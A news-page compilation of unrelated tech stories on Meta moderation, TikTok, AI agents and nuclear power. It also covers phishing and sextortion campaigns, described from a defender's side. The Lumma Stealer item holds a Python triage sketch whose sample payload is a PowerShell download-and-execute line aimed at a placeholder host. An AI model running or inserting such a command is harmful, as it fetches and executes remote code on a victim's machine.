Technology
Meta’s MAGA heel turn is about much more than Trump
On today’s episode of Decoder, we’re diving into an especially messy set of ideas. It’s been a chaotic couple of weeks for big tech companies as the second Trump administration kicks off an unprecedented era in how we think about who controls the internet. Meta’s changed its rules to openly allow more slurs and hate speech on its platforms, TikTok was banned and sort of unbanned, and a bunch of tech CEOs attended the second Trump inauguration.
There’s a major collision, or maybe a merger, happening right now between billionaire power and state power, and everyone who uses tech to communicate (so, basically everyone) is stuck in the middle.
I invited Kate Klonick, a lawyer as well as an associate professor at St. John’s University School of Law, to try and help me work through the different ways the Trump administration is handling companies like Meta and TikTok — and the very concept of free speech online. As you might have guessed, there are a lot of inconsistencies. But the one thing that unites all of this mess is just how big these companies are and how they’ve drafted the Trump administration into some big geopolitical battles.
Kate just returned to the US after more than a year in Europe studying how those countries are thinking about the internet, and she’s got a lot of thoughts about how these geopolitical conflicts are shaping the present and future of online speech and the internet itself. And these fights are having a real impact on how regular people experience these platforms.
Just a few weeks ago, Mark Zuckerberg made a big announcement about shifting content moderation on Meta platforms — he’s getting rid of fact-checking in favor of crowdsourced community notes, and his new terms of service allow a whole lot of bigoted and transphobic content that used to be at least nominally against the rules.
You can read this as a MAGA heel turn from Zuck, and certainly his new haircut suggests a man approaching middle age grasping to reclaim the confidence of youth. But these moves are also international in scope: the EU’s Digital Services Act imposes some potentially very heavy and expensive regulations on social media platforms, and if Trump likes Zuckerberg and Facebook enough, maybe he’ll go fight Europe on Meta’s behalf.
We don’t need to guess at this — this is very much what Zuckerberg himself is saying he wants out of Trump. Pretty bluntly, Zuckerberg is trading transphobia for a new kind of trade war.
This kind of wheeling and dealing is going to define how tech companies handle Trump 2.0 — here at The Verge, we’re calling it gangster tech regulation, and there’s a lot to unpack. There’s also, bluntly, the Trumpiness of it all — a theory of power that is entirely focused on outcomes and doesn’t pay any attention to the legitimacy or fairness of the process that arrives at those outcomes, which creates huge opportunities for open corruption and, well, dictator shit.
That’s what we’ve seen this week with the TikTok ban, which is another victim of the geopolitical war for control of speech on the internet. Congress passed a law that banned TikTok unless the app was divested of Chinese control, but Trump has simply decided to ignore that law for political gain, even though ignoring the law carries such huge penalties that Apple and Google aren’t taking the risk of having TikTok back on their app stores.
Now, Trump is saying he’ll force a sale and that he wants the US government to own 50 percent of TikTok, an idea so problematic that Kate and I found it hard to even list all the First Amendment issues it would cause.
If you’d like to read more about the stories and topics we discussed in this episode, check out the links below:
- Welcome to the era of gangster tech regulation | The Verge
- Trump signs order refusing to enforce TikTok ban for 75 days | The Verge
- Inside Zuckerberg’s sprint to remake Meta for the Trump era | The New York Times
- The internet’s future is looking bleaker by the day | Wired
- Meta is highlighting a splintering global approach to online speech | The Verge
- Mark Zuckerberg lies about content moderation to Joe Rogan’s face | The Verge
- Meta’s ‘tipping point’ is about aligning with power | The Washington Post
- Meta is preparing for an autocratic future | Tech Policy Press
- Meta surrenders to the right on speech | Platformer
- We’re all trying to find the guy who did this | The Atlantic
Decoder with Nilay Patel is a podcast from The Verge about big ideas and other problems.
Technology
JetBrains launches Junie, a new AI coding agent for its IDEs
JetBrains, the company behind coding tools like IntelliJ IDEA for Java and Kotlin (and, indeed, the Kotlin language itself), on Thursday launched Junie, a new AI coding agent. This agent, the company says, will be able to handle routine development tasks when you want to create new applications, and it can understand the context of existing projects you may want to extend with new features.
Using the well-regarded SWE-bench Verified benchmark of 500 common developer tasks, Junie is able to solve 53.6% of them on a single run. Not too long ago, that would have been the top score, but it’s worth noting that at this point, the top-performing models score more than 60%, with Weights & Biases’ “Programmer O1 crosscheck5” currently leading the pack with a score of 64.6%. JetBrains itself calls Junie’s score “promising.”
But even with a lower score, JetBrains’ service may have an advantage because of its tight integration with the rest of JetBrains’ IDEs. The company notes that even as Junie helps developers get their work done, the human remains in control, including when tasks are delegated to the agent.
“AI-generated code can be just as flawed as developer-written code,” the company writes in the announcement. “Ultimately, Junie will not just speed up development — it is poised to raise the bar for code quality, too. By combining the power of JetBrains IDEs with LLMs, Junie can generate code, run inspections, write tests, and verify they have passed.”
It may be a bit before you can try that out yourself, though. The service is only available through an early access program behind a waitlist. For now, it also only works on Linux and Mac, and in the IntelliJ IDEA Ultimate and PyCharm Professional IDEs, with WebStorm coming soon.
Technology
This devious phishing site repurposes legitimate web elements like CAPTCHA pages for malware distribution
- Phishing campaign mimics CAPTCHA to deliver hidden malware commands
- PowerShell command hidden in verification leads to Lumma Stealer attack
- Educating users on phishing tactics is key to preventing such attacks
CloudSEK has uncovered a sophisticated method for distributing the Lumma Stealer malware that poses a serious threat to Windows users.
This technique relies on deceptive human verification pages that trick users into unwittingly executing harmful commands.
While the campaign primarily focuses on spreading the Lumma Stealer malware, its methodology could potentially be adapted to deliver a wide variety of other malicious software.
How the phishing campaign works
The campaign employs trusted platforms such as Amazon S3 and various Content Delivery Networks (CDNs) to host phishing sites, utilizing modular malware delivery where the initial executable downloads additional components or modules, thereby complicating detection and analysis efforts.
The infection chain in this phishing campaign begins with threat actors luring victims to phishing websites that mimic legitimate Google CAPTCHA verification pages. These pages are presented as a necessary identity verification step, tricking users into believing they are completing a standard security check.
The attack takes a more deceptive turn once the user clicks the “Verify” button. Behind the scenes, a hidden JavaScript function activates, copying a base64-encoded PowerShell command onto the user’s clipboard without their knowledge. The phishing page then instructs the user to perform an unusual series of steps, such as opening the Run dialog box (Win+R) and pasting the copied command. Once followed, these instructions cause the PowerShell command to be executed in a hidden window, making detection by the victim almost impossible.
The hidden PowerShell command is the crux of the attack. It connects to a remote server to download additional content such as a text file (a.txt) containing instructions for retrieving and executing the Lumma Stealer malware. Once this malware is installed on the system, it establishes connections with attacker-controlled domains. This allows attackers to compromise the system, steal sensitive data, and potentially launch further malicious activities.
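For defenders triaging such a lure, the clipboard payload itself is ordinarily just base64-encoded text, so it can be inspected safely without ever running it. Below is a minimal Python sketch of that triage step; the sample payload, URL, and helper name are hypothetical and not taken from CloudSEK’s report.

```python
import base64

def decode_suspect_payload(clipboard_text: str) -> str:
    """Decode a base64 blob copied by a fake-CAPTCHA page so it can be read, not run."""
    raw = base64.b64decode(clipboard_text)
    # PowerShell's -EncodedCommand expects UTF-16LE; fall back to UTF-8 for plain base64.
    for encoding in ("utf-16-le", "utf-8"):
        try:
            return raw.decode(encoding)
        except UnicodeDecodeError:
            continue
    return raw.hex()  # last resort: show the raw bytes

# Hypothetical example of what a victim's clipboard might contain after clicking "Verify".
sample = base64.b64encode("IEX (iwr 'https://example.invalid/a.txt')".encode("utf-16-le")).decode()
print(decode_suspect_payload(sample))
```

Reading the decoded command in plain text is usually enough to spot the telltale download-and-execute pattern described above.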
To guard against this phishing campaign, both users and organizations must prioritize security awareness and implement proactive defences. A critical first step is user education.
The deceptive nature of these attacks – disguised as legitimate verification processes – shows the importance of informing users about the dangers of following suspicious prompts, especially when asked to copy and paste unknown commands. Users need to be trained to recognize phishing tactics and question unexpected CAPTCHA verifications or unfamiliar instructions that involve running system commands.
In addition to education, deploying robust endpoint protection is essential for defending against PowerShell-based attacks. Since attackers in this campaign rely heavily on PowerShell to execute malicious code, organizations should ensure that their security solutions are capable of detecting and blocking these activities. Advanced endpoint protection tools with behavioural analysis and real-time monitoring can detect unusual command executions, helping to prevent the malware from being downloaded and installed.
Organizations should also take a proactive approach by monitoring network traffic for suspicious activity. Security teams need to pay close attention to connections with newly registered or uncommon domains, which are often used by attackers to distribute malware or steal sensitive data.
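One lightweight way to approximate that kind of monitoring is to check how recently a contacted domain was registered. The sketch below uses the third-party python-whois package and a hypothetical domain list; treat the field handling as an assumption, since WHOIS responses vary by registrar.

```python
from datetime import datetime, timezone

import whois  # pip install python-whois (third-party; response fields vary by registrar)

MAX_AGE_DAYS = 30  # flag anything registered within the last month

def is_newly_registered(domain: str) -> bool:
    """Return True if the domain looks freshly registered (or has no creation date at all)."""
    record = whois.whois(domain)
    created = record.creation_date
    if isinstance(created, list):  # some registrars return multiple dates
        created = min(created)
    if created is None:
        return True  # a missing creation date is itself worth a closer look
    if created.tzinfo is None:
        created = created.replace(tzinfo=timezone.utc)
    return (datetime.now(timezone.utc) - created).days < MAX_AGE_DAYS

# Hypothetical domains pulled from proxy or DNS logs.
for domain in ["example.com", "freshly-registered-lure.top"]:
    print(domain, "NEW" if is_newly_registered(domain) else "ok")
```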
Finally, keeping systems updated with the latest patches is a crucial defense mechanism. Regular updates ensure that known vulnerabilities are addressed, limiting the opportunity for attackers to exploit outdated software in their efforts to distribute malware like Lumma Stealer.
“This new tactic is particularly dangerous because it plays on users’ trust in widely recognized CAPTCHA verifications, which they encounter regularly online. By disguising malicious activity behind what seems like a routine security check, attackers can easily trick users into executing harmful commands on their systems. What’s more concerning is that this technique, currently distributing the Lumma Stealer, could be adapted to spread other types of malware, making it a highly versatile and evolving threat,” said Anshuman Das, Security Researcher at CloudSEK.
Technology
The Creators of ‘Palworld’ Are Back—This Time With a Horror Game
Pocketpair, the company behind last year’s viral game Palworld, has a new venture: publishing indie games. Its first project, scheduled for release later this year, will be an as-yet-unnamed horror game from Surgent Studios, the developer behind 2024’s Tales of Kenzera: Zau.
Palworld, jokingly referred to as “Pokémon with guns,” was a breakout success last year, drawing in more than 25 million players in its first few months. The company’s step into publishing comes at a turbulent time for video games, especially smaller studios; last year, Among Us developer Innersloth announced its own move into publishing to help push projects forward. Pocketpair’s Palworld success, it seems, is allowing it to do the same.
“As the games industry continues to grow, more and more games find themselves struggling to get funded or greenlit,” John Buckley, head of Pocketpair Publishing, said in a press release announcing the new division. “We think this is a real shame, because there are so many incredible creators and ideas out there that just need a little help to become incredible games.”
It’s no surprise, then, that Pocketpair would work with Surgent Studios, which has struggled to find funding following the release of Zau. The developer put its team on hiatus last year as it sought a partner for its next Kenzera game, currently known as Project Uso.
Surgent’s deal with Pocketpair is separate from Uso, founder Abubakar Salim tells WIRED. Unlike the Afrofuturism of Zau, it’ll be a horror title meant to introduce players to something new. “We’re taking a little detour from the Tales of Kenzera universe,” Salim says.
Salim adds that the horror genre “is a fascinating space that taps into primal emotions, immersing audiences in a reality that’s removed from their own yet strikes something deep and dark within us all.” Pocketpair and Surgent gave few details about the game in Thursday’s announcement, other than to describe it as “short and weird.”
“The world is so raw right now, and it feels natural to craft an experience that reflects and feeds off that intensity,” Salim says.
Pocketpair Publishing has not announced any other future projects. The company has been embroiled in legal drama since last year, when Nintendo filed a lawsuit in Tokyo claiming Palworld infringed on its copyright. Nintendo did not respond to a request for comment. When asked if the lawsuit was of any concern to Surgent, Salim says the studio isn’t worried. “We’re really excited to be working with their new publishing wing to bring this game to life,” he says.
Technology
Substack is spending $20 million to court TikTokers
Meta and YouTube aren’t the only platforms looking to benefit from TikTok potentially disappearing — Substack wants in on the action, too.
The company announced Thursday it’s launching a $20 million “creator accelerator fund,” promising content creators they won’t lose revenue by jumping ship to Substack. Creators in the program also get “strategic and business support” from Substack, and early access to new features.
“We established this fund because we’ve seen creators who specialize in video, audio, and text expand their audience, revenue, and influence on Substack, where the platform’s network effects amplify the quality and impact of the work they’re doing,” the company said in a blog post.
This pivot on Substack’s part has been in the works for a while — for months, the company has been marketing itself not as a newsletter delivery service but as a creator platform similar to Patreon.
“On Substack, [creators] can build their own home on the internet: one where creators, not platform executives or advertisers, own their work and their audience,” the blog post reads. The post also cites “bans, backlash, and policies that change with the political winds” as a reason creators can’t depend on traditional social media services.
That’s all fine (we at The Verge have been saying this for a while). But creators focusing on Substack are also subject to ebbs and flows depending on what the company is prioritizing: first it was newsletters, then tweet-like microblogs, followed by full-on websites and livestreaming. For some, Substack’s initial stated mission of giving more freedom to independent writers is fading. And TikTok creators looking to move to Substack will need to rebuild their following all over again — you obviously can’t export your TikTok followers.
The $20 million fund isn’t the first time Substack has offered a pool of money meant to entice creators. Under a program called Substack Pro, the company poached top media talent from traditional newsrooms with higher pay, health insurance, and other perks. That program ended in 2022, with Substack cofounder Hamish McKenzie saying the deals weren’t employment arrangements but “seed funding deals to remove the financial risk for a writer in starting their own business.” In other words, welcome to Substack. Now that you’re here, you’re on your own — which is more or less the deal other platforms offer.
Technology
Anthropic’s new Citations feature aims to reduce AI errors
In an announcement perhaps timed to divert attention away from OpenAI’s Operator, Anthropic on Thursday unveiled a new feature for its developer API called Citations, which lets devs “ground” answers from its Claude family of AI models in source documents such as emails.
Anthropic says Citations allows its AI models to provide detailed references to “the exact sentences and passages” from docs they use to generate responses. As of Thursday afternoon, Citations is available in both Anthropic’s API and Google’s Vertex AI platform.
As Anthropic explains in a blog post, with Citations, devs can add source files to have models automatically cite claims they inferred from those files. Citations is particularly useful in document summarization, Q&A, and customer support applications, Anthropic says, where the feature can nudge models to insert source citations.
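Based on the pattern Anthropic describes, a citations-enabled request attaches the source document as a content block and flags it for citation. Here is a rough Python sketch; the field names, model string, and sample document are assumptions drawn from Anthropic’s public docs, so check the current API reference before relying on them.

```python
import anthropic  # pip install anthropic

client = anthropic.Anthropic()  # reads ANTHROPIC_API_KEY from the environment

response = client.messages.create(
    model="claude-3-5-sonnet-latest",  # Citations is limited to Claude 3.5 Sonnet and Haiku
    max_tokens=1024,
    messages=[{
        "role": "user",
        "content": [
            {
                "type": "document",
                "source": {
                    "type": "text",
                    "media_type": "text/plain",
                    "data": "The refund window is 30 days from delivery.",  # hypothetical source doc
                },
                "title": "Support policy",
                "citations": {"enabled": True},
            },
            {"type": "text", "text": "How long do customers have to request a refund?"},
        ],
    }],
)

# Cited answers come back as text blocks that may carry a `citations` list pointing
# at the exact passages used; print the text alongside any attached citations.
for block in response.content:
    print(block.text, getattr(block, "citations", None))
```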
Citations isn’t available for all of Anthropic’s models — only Claude 3.5 Sonnet and Claude 3.5 Haiku. Also, the feature isn’t free. Anthropic notes that Citations may incur charges depending on the length and number of the source documents.
Based on Anthropic’s standard API pricing, which Citations uses, a roughly 100-page source doc (on the order of 100,000 tokens) would cost around $0.30 with Claude 3.5 Sonnet, or $0.08 with Claude 3.5 Haiku. That may well be worth it for devs looking to cut down on hallucinations and other AI-induced errors.
Technology
New wave of sextortion scams uses personal details and images to intimidate targets while bypassing traditional security measures
- Sextortion scams evolve with personalized tactics and heightened intimidation.
- Threat actors exploit invoicing platforms to bypass email security filters.
- Robust email filters and training help counter sextortion threats effectively.
Sextortion scams are becoming more complex and personal, as they now frequently target individuals across different sectors with greater precision, creating a sense of immediate threat.
Cofense Phish Defense Center (PDC) recently observed a notable evolution in sextortion scams which, unlike earlier versions that relied primarily on generic scare tactics, now use more sophisticated strategies, often bypassing traditional security measures.
The campaigns now personalize emails, including personal details such as the target’s home address or phone number directly in the email body, to capture the recipient’s attention and add a layer of credibility to the scam.
Exploitation of fear through technical jargon
These emails generally originate from random Gmail accounts, which are harder to trace, rather than the typical impersonated addresses seen in earlier scams.
In addition to personal information, scammers have escalated their approach by including images of the target’s supposed home, workplace, neighbourhood or street in attached PDF files.
The email addresses the recipient by name and provides a specific location, followed by threats of a physical visit if the target fails to comply. This blend of personal details and digital intimidation is a shift from the simpler sextortion scams that used to rely solely on the fear of compromised online privacy.
The scam emails claim that the target’s device has been infected with spyware, often citing “Pegasus” as the malware responsible for the supposed breach. Threat actors use technical jargon to manipulate recipients, counting on them having a limited understanding of cybersecurity. The emails claim that the attacker has been monitoring the victim for an extended period, gathering sensitive information, and even recording videos of them.
In some cases, the scammer adopts a casual tone, lacing the message with slang or compliments to make it seem as if they have been closely observing the target’s life. The message typically concludes with two choices: ignore the email and face public humiliation, or pay a ransom in cryptocurrency to ensure the alleged compromising material is never released.
A recurring part of these scams is the demand for payment in Bitcoin or other cryptocurrencies. Scammers often provide a Bitcoin wallet address, sometimes alongside a QR code to facilitate the payment process.
Another notable shift in sextortion campaigns is the use of invoicing services to deliver phishing emails. These services allow threat actors to send emails that bypass certain security protocols by disguising the sender’s information. Since these invoicing platforms handle the email’s delivery, their legitimate headers and content often allow the message to avoid detection.
To combat these evolving scams, individuals and organizations must stay informed and vigilant. Educating users about the nature of sextortion scams and the tactics employed by attackers can reduce the likelihood of falling victim.
Technology
Bill Gates’ nuclear energy startup inks new data center deal
TerraPower, a nuclear energy startup founded by Bill Gates, struck a deal this week with one of the largest data center developers in the US to deploy advanced nuclear reactors. TerraPower and Sabey Data Centers (SDC) are working together on a plan to run existing and future facilities on nuclear energy from small reactors.
Tech companies are scrambling to determine where to get all the electricity they’ll need for energy-hungry AI data centers that are putting growing pressure on power grids. They’re increasingly turning to nuclear energy, including next-generation reactors that startups like TerraPower are developing.
“The energy sector is transforming at an unprecedented pace after decades of business as usual, and meaningful progress will require strategic collaboration across industries,” TerraPower President and CEO Chris Levesque said in a press release.
A memorandum of understanding signed by the two companies establishes a “strategic collaboration” that’ll initially look into the potential for new nuclear power plants in Texas and the Rocky Mountain region that would power SDC’s data centers.
There’s still a long road ahead before that can become a reality. The technology TerraPower and similar nuclear energy startups are developing still has to make it through regulatory hurdles and prove that it can be commercially viable.
Compared to older, larger nuclear power plants, the next generation of reactors is supposed to be smaller and easier to site. Nuclear energy is seen as an alternative to fossil fuels that are causing climate change. But it still faces opposition from some advocates concerned about the impact of uranium mining and of storing radioactive waste near communities.
“I’m a big believer that nuclear energy can help us solve the climate problem, which is very, very important. There are designs that, in terms of their safety or fuel use or how they handle waste, I think, minimize those problems,” Gates told The Verge last year.
TerraPower’s reactor design for this collaboration, Natrium, is the only advanced technology of its kind with a construction permit application for a commercial reactor pending with the U.S. Nuclear Regulatory Commission, according to the company. The company just broke ground on a demonstration project in Wyoming last year, and expects it to come online in 2030.
Technology
Threads rolls out a post scheduler, ‘markup’ feature, and more
While Meta lures TikTok creators to Instagram and Facebook with cash bonuses, its X competitor Instagram Threads is now making things easier for creators, brands, and others who need more professional tools to manage their presence on the app. On Thursday, Instagram head Adam Mosseri announced a small handful of new features coming to Threads, including a way to schedule posts and view more metrics within Insights.
In a post on the social network, Mosseri shared that users would now be able to schedule posts on Threads and view the metrics for individual posts within the Insights dashboard, which offers a way for Threads users to track trends, including views, follower counts and geographic demographics, the number and type of interactions, and more, for a given time period.
In addition, he said that Threads is adding a new feature that allows users to “mark up” a post they’re resharing so they can include their own creative take. While Mosseri didn’t elaborate on what that means or share an example, earlier findings from tech enthusiast Chris Messina indicate that Threads will add a new icon, next to the buttons for adding photos, GIFs, voice, hashtags, and more, that provides access to this feature.
The squiggle icon, when clicked, takes users to a screen where they can choose between tools like a highlighter pen or an arrow that let them draw directly on a Threads post. This feature was also spotted last week by Lindsey Gamble, who posted on Threads to show the feature in action.
It’s an odd sort of addition for Threads, given that users more often share something clipped from the web, like a news article, where they’ve added a highlight or underline in a screenshot. There hasn’t been much consumer demand for a tool to mark up Threads posts directly.
However, the feature does offer Threads users something unique, when compared with social networking rivals like X, Bluesky, and Mastodon — and that could be the point.
Technology
This AI tool helps content creators block unauthorized scraping and manage bot interactions
- Cloudflare AI Audit offers analytics to track and monetize content usage
- Creators regain control with automated tools and fair compensation
- Cloudflare bridges creators and AI firms for balanced content use
As artificial intelligence use cases continue to evolve, there is a growing concern from website owners and content creators over the unauthorized use of their content by AI bots.
Many websites, ranging from large media corporations to small personal blogs, are being scanned by AI models without the creators’ knowledge or compensation, not only affecting businesses but also diminishing the value of online content.
In response to these challenges, Cloudflare has introduced AI Audit, a new suite of tools designed to help content creators manage how their work is accessed by AI bots.
Cloudflare AI Audit
AI models require large amounts of data for training, and many website owners find that their content is being scraped by bots for use in training artificial intelligence systems.
These bots can scan a website multiple times a day, gathering vast amounts of data, but this AI scraping can be overwhelming for content creators, particularly those running small websites or independent blogs.
Without a clear understanding of how their content is being used or the resources to fight back, creators often have little choice but to allow AI models to scrape their work.
Cloudflare’s AI Audit seeks to change that dynamic, giving creators the tools they need to regain control.
For content creators, this practice presents two major concerns: loss of control over their work and the absence of compensation. Content creators may not even be aware of the scale of these activities, as traditional analytics tools do not usually track how AI models interact with their sites.
AI Audit allows creators to manage and block this activity via an easy, automated, and one-click solution to limit unwanted bot interactions. In addition to automated controls, AI Audit offers detailed analytics that give website owners insights into how often their content is being accessed by AI bots. These analytics reveal the types of bots scanning their site, the purpose behind the data collection, and whether attribution is being given when the data is used.
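For site owners outside Cloudflare, the same question (which AI bots are hitting a site, and how often) can be roughly approximated by tallying known crawler user agents in ordinary access logs. A minimal Python sketch follows; the user-agent list and log path are illustrative, not an exhaustive or Cloudflare-endorsed set.

```python
from collections import Counter

# Publicly documented crawler user-agent substrings; extend as needed (illustrative list).
AI_CRAWLERS = ["GPTBot", "ClaudeBot", "CCBot", "Google-Extended", "PerplexityBot", "Bytespider"]

def count_ai_crawler_hits(log_path: str) -> Counter:
    """Tally requests whose user-agent string mentions a known AI crawler."""
    hits = Counter()
    with open(log_path, encoding="utf-8", errors="replace") as log:
        for line in log:
            for bot in AI_CRAWLERS:
                if bot in line:
                    hits[bot] += 1
                    break
    return hits

# Hypothetical access log in common/combined format.
for bot, count in count_ai_crawler_hits("access.log").most_common():
    print(f"{bot}: {count} requests")
```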
AI Audit also provides advanced metrics that help content creators negotiate fair deals with AI companies. By understanding the rate at which their content is crawled and utilized, creators can ensure they are compensated for their work. This tool also provides standardized terms of use, helping creators safeguard their rights and maintain control over how their content is used in the growing AI landscape.
Cloudflare is also working on a feature that will allow content creators to set fair prices for the right to scan their content. This will be very helpful for those creators who have no idea how the transaction should proceed and will also make it easier for both creators and AI companies to engage in mutually beneficial exchanges.
“AI will dramatically change content online, and we must all decide together what its future will look like,” said Matthew Prince, co-founder and CEO of Cloudflare.
“Content creators and website owners of all sizes deserve to own and have control over their content. If they don’t, the quality of online information will deteriorate or be locked exclusively behind paywalls.”
Technology
Perplexity now has a mobile assistant on Android
Perplexity has turned its AI “answer engine” into a mobile assistant on Android. The new assistant can answer general questions and perform tasks on your behalf, such as writing an email, setting a reminder, booking dinners, and more.
It’s also multimodal, meaning you can ask it questions about what’s on your screen as well as have it open your camera and “see” what’s in front of you. In an example shared by Perplexity, a user asks the assistant to “get me a ride.” Once it learns where the user wants to go, the assistant automatically opens Uber with available rides to that destination.
I tried it out for myself, and it is kind of neat. When I asked it to “open up a good podcast,” my phone started playing the latest episode of The Joe Rogan Experience on YouTube. It worked rather quickly, even though its taste may be questionable.
Using my phone’s camera, Perplexity’s assistant successfully identified the promotional Pokémon pack I got in a McDonald’s Happy Meal (don’t judge), which I found impressive since the promotion only started a couple of days ago. It also helped me write and send a text to a family member using the information in my contacts.
Alongside Samsung’s announcement of the Gemini-equipped Galaxy S25, Google revealed that its AI assistant can now complete tasks across multiple apps, as well as complete multimodal requests.
But Perplexity’s assistant doesn’t work across every app and with every feature. It’s not able to access Slack or Reddit, for example, and I also couldn’t use it to leave a comment on a YouTube video. Right now, the assistant supports Spotify, YouTube, and Uber, along with email, messaging, and clock apps, according to Perplexity spokesperson Sara Platnick. “We’re continuing to add support for more apps and more functionality though, so this is just the starting point,” Platnick adds.
You can enable the assistant through the Perplexity app, which prompts you to replace your phone’s default assistant with Perplexity. From there, you can swipe up on the left corner of your screen or hold down your home button to access the assistant.
It’s currently not available on the iPhone, however. “If Apple gives us the right permissions, we’ll make it happen,” Platnick says.